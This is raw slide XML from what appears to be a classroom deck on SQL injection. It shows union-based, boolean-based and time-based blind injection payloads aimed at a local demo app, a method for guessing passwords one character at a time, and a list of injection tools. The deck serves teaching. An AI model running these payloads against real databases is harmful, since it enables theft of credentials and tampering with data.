                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1257945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200" dirty="0" err="1" smtClean="0"/>
                        <a:t>userid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email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username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04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john@gmail.com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 smtClean="0"/>
                        <a:t>johntan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198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john@gmail.com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abc123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06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jack@gmail.com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xyz123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477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…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…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…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06318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3555623" y="4368904"/>
            <a:ext cx="512321" cy="407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868144" y="4480312"/>
            <a:ext cx="432048" cy="29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23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Step 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Getting other useful information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="276965"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Let’s try to extract the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" smtClean="0"/>
              <a:t>MySQL version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1385" noProof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385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  <a:r>
              <a:rPr lang="en-US" sz="1385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 SELECT @@version;-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1385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385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385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85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DON’T WORK!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1385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965"/>
            <a:r>
              <a:rPr lang="en-US" sz="1385" dirty="0"/>
              <a:t>Let’s try to extract the version number again!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1385" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1385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385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  <a:r>
              <a:rPr lang="en-US" sz="1385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 SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1385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1,2,@@version;-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1385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br>
              <a:rPr lang="en-US" sz="1385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85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385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 WORKS. NOTE UNION STATEMENTS NEED TO HAVE SAME NUMBER OF COLUMNS AND COMPATIBLE DATA TYPES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1385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385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385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6098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" noProof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567"/>
            <a:endParaRPr lang="en-US" noProof="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Now for the attack!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387636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31" b="1" dirty="0"/>
              <a:t>Step 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2031" b="1" dirty="0" smtClean="0"/>
              <a:t>Can we union select other tables in the database?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2031" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>YES, but how?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1385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385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385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400" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://dev.mysql.com/doc/refman/8.0/en/information-schema.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1385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6098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" noProof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567"/>
            <a:endParaRPr lang="en-US" noProof="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Now for the attack!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258642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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/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dirty="0"/>
              <a:t>A subset of the an unverified/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>un-sanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerability by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>convincing the application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>run SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code that was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>not intended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site scripting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lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-site scripting (XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a type of computer security vulnerability typically found in Web applications that enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>client-side script into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> viewed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>other users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy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31" b="1" dirty="0"/>
              <a:t>Step 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2031" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2031" b="1" dirty="0" smtClean="0"/>
              <a:t> “Table” and “Columns”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2031" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" err="1" smtClean="0"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>schema, we can extract useful information like the table and schema names in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>Then from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" err="1" smtClean="0"/>
              <a:t>Information_Schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t> schema, we can extract columns names of the available tables in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1846" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>Exercise: Let’s extract data from another table using the above technique! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1846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6098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" noProof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567"/>
            <a:endParaRPr lang="en-US" noProof="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316412"/>
            <a:ext cx="7849567" cy="678953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Now for the attack!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370816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Blind SQL Injection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 smtClean="0"/>
              <a:t>Advanced SQL injection technique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Does not respond with a retrieval of data from the database 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The attacker can only make inference from the success or failure of the SQL execution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A failure of the execution will usually show a different page or a general error message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB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21</a:t>
            </a:fld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4248834" y="33477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Arial</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190694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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000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29C01-F2FD-4307-BC33-AC7BADD0C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6" y="1306393"/>
            <a:ext cx="8642349" cy="47529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b="1" dirty="0" smtClean="0"/>
              <a:t>SQL Blind Injection:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>localhost:3001/viewUsers.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>Code modified to return only 1 record</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>: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(Commented out as V2 in the source code file)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>else { </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>arrResult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>=[]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>	console.log(result);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>arrResult.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>(result[0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>]);//show only 1 matching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>record</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>(null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>arrResult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>      }</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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351694" y="6059367"/>
            <a:ext cx="301869" cy="271096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E224AADB-8ECD-41A6-952A-C5C407130DF3}" type="slidenum">
              <a:rPr lang="de-AT" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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1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 smtClean="0"/>
              <a:t>ANALYSIS OF PAGE RESPONSE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With this new query, page will only show one record if query successful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>Attempting a union select will still just retrieve 1 record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>Unable to extract all the data through formulation of an injected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t> query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t> statement runs successfully=&gt;One record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t> Statement fails=&gt;Error message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4431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 smtClean="0"/>
              <a:t>Strategy for blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="4000" dirty="0" smtClean="0"/>
              <a:t> injection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How to extract and decipher data from the database?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>We employ Boolean based query in select statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>IF some condition true return 1 else 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>Note 1 is a valid user id which will show a valid response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8087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 smtClean="0"/>
              <a:t>ORIGINAL QUERY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Original Query: 1</a:t>
            </a:r>
          </a:p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06" y="2492896"/>
            <a:ext cx="7579987" cy="402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 smtClean="0"/>
              <a:t>Verifying blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="4000" dirty="0" smtClean="0"/>
              <a:t> injection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 Query: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>’   and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>1=1;-- - </a:t>
            </a:r>
          </a:p>
          <a:p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430609"/>
            <a:ext cx="7355491" cy="39076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73854" y="1289682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Boolean True Query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7704" y="1628800"/>
            <a:ext cx="1080120" cy="50749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2987824" y="1474348"/>
            <a:ext cx="1486030" cy="226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 smtClean="0"/>
              <a:t>BOOLEAN-based query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6" y="1412776"/>
            <a:ext cx="8642349" cy="4752974"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SELECT-statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" b="1" dirty="0"/>
              <a:t>top 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0" err="1"/>
              <a:t>userid,email,username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t> FROM user WHERE </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[SOME_CONDITION] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ‘1’, ‘0’);-- - </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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[SOME_CONDITION]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>could be: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Is there a table in database called user (Probe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> table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Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>first character of password of user with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 1 in user table equal to ‘a’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>    (SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>(password,1,1) FROM user where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>=1)=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0" smtClean="0"/>
              <a:t>'a‘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>force checking until the database is read</a:t>
            </a:r>
          </a:p>
          <a:p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68515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852488" y="99091"/>
            <a:ext cx="7772400" cy="1609344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="4400" dirty="0"/>
              <a:t>BOOLEAN-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="4400" dirty="0" smtClean="0"/>
              <a:t>query with time-based</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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916113"/>
            <a:ext cx="8229600" cy="295275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dirty="0" smtClean="0"/>
              <a:t>Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>based – Based on a observed delay / no delay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When condition is true, a noticeable time lag is observed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dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> a 10s time lag is observed if condition is true:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>([SOME_CONDITION], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SLEEP(10),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0)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08669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SQL operations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SQL injection can also be deployed to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Update records like password or modify data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Insert fake records like login credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Delete records</a:t>
            </a:r>
          </a:p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253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SQL INJECTION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One of the vulnerabilities in OWASP Top 1 vulnerability: Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>OWASP Top vulnerability:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285251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Tools for SQL injections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BSQL  - In beta, very promising injection / takeover tool with GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://code.google.com/p/bsqlhacker/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0"/>
              <a:t>Sqlmap – Open source, very good tutorial / slides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://sqlmap.sourceforge.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0"/>
              <a:t>SQLninja – Highly automated Injection / takeover tool for MS SQL server (only) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://sqlninja.sourceforge.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0"/>
              <a:t>Havij – Demo version have some limitations, very user friendly  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://itsecteam.com/en/projects/project1.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
